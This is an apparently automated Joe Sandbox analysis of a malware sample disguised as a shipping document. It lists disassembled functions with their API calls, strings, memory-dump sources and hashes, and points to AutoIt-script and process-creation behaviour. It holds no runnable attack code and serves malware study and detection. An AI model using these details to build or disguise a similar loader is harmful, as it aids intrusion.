APIs

Part of subcall function 006841A9: LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,006839FE,?,00000001), ref: 006841DB

_free.LIBCMT ref: 006F36B7
_free.LIBCMT ref: 006F36FE

Part of subcall function 0068C833: __wsplitpath.LIBCMT ref: 0068C93E
Part of subcall function 0068C833: _wcscpy.LIBCMT ref: 0068C953
Part of subcall function 0068C833: _wcscat.LIBCMT ref: 0068C968
Part of subcall function 0068C833: SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,00000001,?,?,00000000), ref: 0068C978

Strings

>>>AUTOIT SCRIPT<<<, xrefs: 006F3491
Bad directive syntax error, xrefs: 006F36E4

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: _free$CurrentDirectoryLibraryLoad__wsplitpath_wcscat_wcscpy
String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
API String ID: 805182592-1757145024
Opcode ID: c4edf296f254568c6bd8f0c26766874ac30f4bc01ee568eb3689c93ec671e5ee
Instruction ID: 47a34f281f76e75845691f432b08f3d349d306929a198836a00615241e91359b
Opcode Fuzzy Hash: c4edf296f254568c6bd8f0c26766874ac30f4bc01ee568eb3689c93ec671e5ee
Instruction Fuzzy Hash: 7E915A71910229ABCF44EFA4CC919FEB7B6BF18310F10452DF916AB391DB349A05CBA4

Function 00F05B98 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 146fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00F05A88: Sleep.KERNELBASE(000001F4), ref: 00F05A99

CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 00F05CA5

Strings

63Z0TBIO60HIRXU2XN6Q, xrefs: 00F05D25, 00F05D28

Memory Dump Source

Source File: 00000000.00000002.2160657406.0000000000F03000.00000040.00000020.00020000.00000000.sdmp, Offset: 00F03000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f03000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: CreateFileSleep
String ID: 63Z0TBIO60HIRXU2XN6Q
API String ID: 2694422964-511052344
Opcode ID: f6da9dee6a472a69ef52320081b2eea4c9daf95c2f5d098ab58886f75bc90310
Instruction ID: e0793a69d5b55af15406279fed68b953bf2792dd22a67b4e8d2197c61419dab2
Opcode Fuzzy Hash: f6da9dee6a472a69ef52320081b2eea4c9daf95c2f5d098ab58886f75bc90310
Instruction Fuzzy Hash: 5251A471D04249EBEF11D7A4CC18BEFBBB9AF05700F004599E6087B2C1D6B91B48DB65

Function 006840E5 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 64COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 006F3725
GetOpenFileNameW.COMDLG32 ref: 006F376F

Part of subcall function 0068660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,006853B1,?,?,006861FF,?,00000000,00000001,00000000), ref: 0068662F

Part of subcall function 006840A7: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 006840C6

Strings

t3s, xrefs: 006F3745
X, xrefs: 006F373E

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: Name$Path$FileFullLongOpen_memset
String ID: X$t3s
API String ID: 3777226403-2408500804
Opcode ID: 1f166f1949dc1879184cba0ea9ed569cb6db02bd413894174a0171b049b8439f
Instruction ID: d9041ba728d93a88ac70a623c24ddb2c54dbc87e45354cf79c568ecb37042100
Opcode Fuzzy Hash: 1f166f1949dc1879184cba0ea9ed569cb6db02bd413894174a0171b049b8439f
Instruction Fuzzy Hash: 4421C671A001989BDB51EFD4C8057EE7BFA9F49304F00806DE504A7241DFB85A898F69

Function 006A34AE Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 61COMMON

Download Yara Rule

APIs

__getstream.LIBCMT ref: 006A34FE

Part of subcall function 006A7C0E: __getptd_noexit.LIBCMT ref: 006A7C0E

@_EH4_CallFilterFunc@8.LIBCMT ref: 006A3539
__wopenfile.LIBCMT ref: 006A3549

Strings

<G, xrefs: 006A34CD, 006A34F0, 006A34FC

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: CallFilterFunc@8__getptd_noexit__getstream__wopenfile
String ID: <G
API String ID: 1820251861-2138716496
Opcode ID: 05df173326841c2360a4f569cc347978db024d9ed2ac626297ffc05d6e370d70
Instruction ID: 8fdec48ce51fe7daf472ec3997ad170a74448925995ae0b9da103976ae9d1055
Opcode Fuzzy Hash: 05df173326841c2360a4f569cc347978db024d9ed2ac626297ffc05d6e370d70
Instruction Fuzzy Hash: 8911E7B0A003169EDB91BF749C426AE76E7AF4B350B148429F415C7381EB34CE119FB5

Function 0069D298 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,0069D28B,SwapMouseButtons,00000004,?), ref: 0069D2BC
RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,0069D28B,SwapMouseButtons,00000004,?,?,?,?,0069C865), ref: 0069D2DD
RegCloseKey.KERNELBASE(00000000,?,?,0069D28B,SwapMouseButtons,00000004,?,?,?,?,0069C865), ref: 0069D2FF

Strings

Control Panel\Mouse, xrefs: 0069D2BA

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID: Control Panel\Mouse
API String ID: 3677997916-824357125
Opcode ID: 121e40177d00a6dd261ce9dc4c3c779562276c3001a990ac14ab94eb958a15cf
Instruction ID: 3775c22d18dd2a18f644ba925a38c16f7a9d468d53acc2a54c12daf1a8700332
Opcode Fuzzy Hash: 121e40177d00a6dd261ce9dc4c3c779562276c3001a990ac14ab94eb958a15cf
Instruction Fuzzy Hash: 54115775611208FFDF208FA8CC84EEE7BBDEF05740B008569A905D7210E631AE41AB64

Function 006A365B Relevance: 6.2, APIs: 4, Instructions: 162COMMONLIBRARYCODE

Download Yara Rule

APIs

_memset.LIBCMT ref: 006A36B7
_memcpy_s.LIBCMT ref: 006A3729
__filbuf.LIBCMT ref: 006A37AA
_memset.LIBCMT ref: 006A37EE

Part of subcall function 006A7C0E: __getptd_noexit.LIBCMT ref: 006A7C0E

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: _memset$__filbuf__getptd_noexit_memcpy_s
String ID:
API String ID: 3877424927-0
Opcode ID: 25276d1f646da7b76298e578b8e053e7e3b96e54df01e447abe6ae266d0f960a
Instruction ID: 02df7cf7ce99fa8c3b332f35b9b6b6d5eb9b5c252b533977e40d52b58ab0c3d9
Opcode Fuzzy Hash: 25276d1f646da7b76298e578b8e053e7e3b96e54df01e447abe6ae266d0f960a
Instruction Fuzzy Hash: CC5194B0A00325ABDB24AF6988846AE77A3AF43320F24862DF825963D0D775DF518F54

Function 00682322 Relevance: 6.2, APIs: 3, Strings: 1, Instructions: 159COMMON

Download Yara Rule

APIs

Part of subcall function 006822A4: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,006824F1), ref: 00682303

GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 006825A1
CoInitialize.OLE32(00000000), ref: 00682618
CloseHandle.KERNEL32(00000000), ref: 006F503A

Strings

(S, xrefs: 006823CD

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: Handle$CloseInitializeMessageRegisterWindow
String ID: (S
API String ID: 3815369404-2585319759
Opcode ID: f4f7449e63d27bb364a6a3c678583f57cbcf8179cef32ca08c2b3cfc2cffc30a
Instruction ID: 1e6fe381b4044ecd241e8b50983caa48d168099994a8296b39c4b7dddd7c80bd
Opcode Fuzzy Hash: f4f7449e63d27bb364a6a3c678583f57cbcf8179cef32ca08c2b3cfc2cffc30a
Instruction Fuzzy Hash: B5719CB8A413858BC344FF6AE9A0495BBA5BB5A3447C0C26FD119C76B2DBBC4480CF1D

Function 006CC396 Relevance: 6.2, APIs: 4, Instructions: 154COMMON

Download Yara Rule

APIs

Part of subcall function 00684517: _fseek.LIBCMT ref: 0068452F

Part of subcall function 006CC56D: _wcscmp.LIBCMT ref: 006CC65D
Part of subcall function 006CC56D: _wcscmp.LIBCMT ref: 006CC670

_free.LIBCMT ref: 006CC4DD
_free.LIBCMT ref: 006CC4E4
_free.LIBCMT ref: 006CC54F

Part of subcall function 006A1C9D: RtlFreeHeap.NTDLL(00000000,00000000,?,006A7A85), ref: 006A1CB1
Part of subcall function 006A1C9D: GetLastError.KERNEL32(00000000,?,006A7A85), ref: 006A1CC3

_free.LIBCMT ref: 006CC557

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
String ID:
API String ID: 1552873950-0
Opcode ID: 2db9d723d2f1f24614347a7e6fc8c80c315d14cd5ac174f49895e1fbecc6b5fc
Instruction ID: be8fee092676a84c156ec3899bb114e1bb578921b38c2c9e93041ff2d1d0fa76
Opcode Fuzzy Hash: 2db9d723d2f1f24614347a7e6fc8c80c315d14cd5ac174f49895e1fbecc6b5fc
Instruction Fuzzy Hash: F7517EB1904219AFDF54AF64DC81BADBBBAEF48314F00409EF20DA7241DB715E908F58

Function 0069EB83 Relevance: 6.1, APIs: 4, Instructions: 65timewindowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0069EBB2

Part of subcall function 006851AF: _memset.LIBCMT ref: 0068522F
Part of subcall function 006851AF: _wcscpy.LIBCMT ref: 00685283
Part of subcall function 006851AF: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00685293

KillTimer.USER32(?,00000001,?,?), ref: 0069EC07
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 0069EC16
Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 006F3C88

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
String ID:
API String ID: 1378193009-0
Opcode ID: 10ec271b5059e4a7e53f84967fe9c693f3ec5bf3e5141aff790a450eb95412c3
Instruction ID: 01efa72d8a0e5e7830bbf3853dcf52999478a1c282258fd027c990477e39583e
Opcode Fuzzy Hash: 10ec271b5059e4a7e53f84967fe9c693f3ec5bf3e5141aff790a450eb95412c3
Instruction Fuzzy Hash: 05210770504794DFEB32DB28C859BE7BFED9B01308F04008DE69E66342C7756A85CB15

Function 00F047E8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(?,00000000), ref: 00F0482D
ExitProcess.KERNEL32(00000000), ref: 00F0484C

Strings

D, xrefs: 00F047F9

Memory Dump Source

Source File: 00000000.00000002.2160657406.0000000000F03000.00000040.00000020.00020000.00000000.sdmp, Offset: 00F03000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f03000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: Process$CreateExit
String ID: D
API String ID: 126409537-2746444292
Opcode ID: 145b7a1cfb31929a6d02ccf2d0a45045f2bdb13625618a76059d23da88a780f4
Instruction ID: 17511cfbabf4af796ffddbbf0c1064cbbb58e4a43aa5732256c2f6126ad23195
Opcode Fuzzy Hash: 145b7a1cfb31929a6d02ccf2d0a45045f2bdb13625618a76059d23da88a780f4
Instruction Fuzzy Hash: A3F0F4B194524CABDB60DFE0CC49FEE777CBF44701F548909FB099A180DB749508AB51

Function 006CC71A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15COMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(00000104,?), ref: 006CC72F
GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 006CC746

Strings

aut, xrefs: 006CC740

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: Temp$FileNamePath
String ID: aut
API String ID: 3285503233-3010740371
Opcode ID: 3e8c098273a40c549445820f4ba49357d40a337ceafea63e3fe332e7ee829c66
Instruction ID: 70dcaca56581aa324031fb8b8a7ed7d3415b73e75c79d128bf3c8cb339758aaf
Opcode Fuzzy Hash: 3e8c098273a40c549445820f4ba49357d40a337ceafea63e3fe332e7ee829c66
Instruction Fuzzy Hash: 74D05E7150030EEBDB20AB90DC0EF8A776CA700708F0042A07650A50B2DAF8EA998B58

Function 006DF8AE Relevance: 4.9, APIs: 3, Instructions: 385COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9f181a58da0fca3a4ded365af1cbafa578c81ec289ce56f89fe4b041b063a3d0
Instruction ID: 4f6238867de85d80d9fb6277562cb88b4c758f6a439cb25b9ad5cc4e4667c44d
Opcode Fuzzy Hash: 9f181a58da0fca3a4ded365af1cbafa578c81ec289ce56f89fe4b041b063a3d0
Instruction Fuzzy Hash: D3F17B71A043019FCB50DF24C891B6AB7E6FF88314F14892EF9969B391D770E905CB82

Function 00684FFC Relevance: 4.6, APIs: 3, Instructions: 77windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00685022
Shell_NotifyIconW.SHELL32(00000000,?), ref: 006850CB

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: IconNotifyShell__memset
String ID:
API String ID: 928536360-0
Opcode ID: 1b3774989e76e6c2a8a041a6d520116e28d14cf06669b70100a8e8026a03307b
Instruction ID: 096dd8b091e2b5934279aae7c4531e79baa5a007420f2981f5eda1ac3154a5c5
Opcode Fuzzy Hash: 1b3774989e76e6c2a8a041a6d520116e28d14cf06669b70100a8e8026a03307b
Instruction Fuzzy Hash: 6531ACB0504701CFC321EF64D8446DBBBE9FF49308F004A2EF69A82350E771A984CB96

Function 006A395C Relevance: 4.6, APIs: 3, Instructions: 59memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

__FF_MSGBANNER.LIBCMT ref: 006A3973

Part of subcall function 006A81C2: __NMSG_WRITE.LIBCMT ref: 006A81E9
Part of subcall function 006A81C2: __NMSG_WRITE.LIBCMT ref: 006A81F3

__NMSG_WRITE.LIBCMT ref: 006A397A

Part of subcall function 006A821F: GetModuleFileNameW.KERNEL32(00000000,00740312,00000104,00000000,00000001,00000000), ref: 006A82B1
Part of subcall function 006A821F: ___crtMessageBoxW.LIBCMT ref: 006A835F

Part of subcall function 006A1145: ___crtCorExitProcess.LIBCMT ref: 006A114B
Part of subcall function 006A1145: ExitProcess.KERNEL32 ref: 006A1154

Part of subcall function 006A7C0E: __getptd_noexit.LIBCMT ref: 006A7C0E

RtlAllocateHeap.NTDLL(00C90000,00000000,00000001,00000001,00000000,?,?,0069F507,?,0000000E), ref: 006A399F

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
String ID:
API String ID: 1372826849-0
Opcode ID: 4c06499586efa22adca3378f608acf9d74c175ee00261a23f8e1ba35ab6da0f3
Instruction ID: dceb93320c10b5ab3f4bbbfa04a8c47fa5de3a6033861695d6f3b2902265f4ff
Opcode Fuzzy Hash: 4c06499586efa22adca3378f608acf9d74c175ee00261a23f8e1ba35ab6da0f3
Instruction Fuzzy Hash: 6001FE753453219FE6513B64EC4276B738A9F83760F21002EF5019B391EFB49D014DA8

Function 006CC6D9 Relevance: 4.5, APIs: 3, Instructions: 24filetimeCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,006CC385,?,?,?,?,?,00000004), ref: 006CC6F2
SetFileTime.KERNELBASE(00000000,?,00000000,?,?,006CC385,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 006CC708
CloseHandle.KERNEL32(00000000,?,006CC385,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 006CC70F

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: File$CloseCreateHandleTime
String ID:
API String ID: 3397143404-0
Opcode ID: 8b5aff5a61217b9950a570b8678db4d6fdd476e8cdaa1ba6818974de5c53ee18
Instruction ID: 9d98334d1d8aec9eeac835952a9980efc48779ef65837b56e75593d2aa7274ab
Opcode Fuzzy Hash: 8b5aff5a61217b9950a570b8678db4d6fdd476e8cdaa1ba6818974de5c53ee18
Instruction Fuzzy Hash: F0E08632140318F7D7311B94AC09FCA7F19EB05770F108310FB14690E09BB56911879C

Function 006CBB64 Relevance: 4.5, APIs: 3, Instructions: 22COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 006CBB72

Part of subcall function 006A1C9D: RtlFreeHeap.NTDLL(00000000,00000000,?,006A7A85), ref: 006A1CB1
Part of subcall function 006A1C9D: GetLastError.KERNEL32(00000000,?,006A7A85), ref: 006A1CC3

_free.LIBCMT ref: 006CBB83
_free.LIBCMT ref: 006CBB95

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 9be2b5beef45e3014043d3abdf219173afad32993680376f9e1db3d5b0d03a7e
Instruction ID: 2ab0c85613c97bf700d36f6648cd52e764763a519ce4359ce12b900aff3b1ff8
Opcode Fuzzy Hash: 9be2b5beef45e3014043d3abdf219173afad32993680376f9e1db3d5b0d03a7e
Instruction Fuzzy Hash: 86E0C2A160070142CA2075786E45FF313CD8F06321F04180EB41AEB242CF28EC4088B8

Function 006CBBE8 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 50COMMON

Download Yara Rule

APIs

__fread_nolock.LIBCMT ref: 006CBC18

Strings

EA06, xrefs: 006CBC46

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: __fread_nolock
String ID: EA06
API String ID: 2638373210-3962188686
Opcode ID: a2ffae2a69d759afa47901379b93ec3e54c501f45d50c070915e6942f3bb3270
Instruction ID: 1787e569a7ea14b9c6586e8b06b5c9c93483b23c1428bbbf9882d3ed6c7a88de
Opcode Fuzzy Hash: a2ffae2a69d759afa47901379b93ec3e54c501f45d50c070915e6942f3bb3270
Instruction Fuzzy Hash: 6301F9719042187EDB68C798C816FFDBBF8DB05301F00415EF152D6281D578A7048B60

Function 006E0828 Relevance: 3.2, APIs: 2, Instructions: 232COMMON

Download Yara Rule

APIs

_strcat.LIBCMT ref: 006E08FD

Part of subcall function 0068936C: __swprintf.LIBCMT ref: 006893AB
Part of subcall function 0068936C: __itow.LIBCMT ref: 006893DF

_wcscpy.LIBCMT ref: 006E098C

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
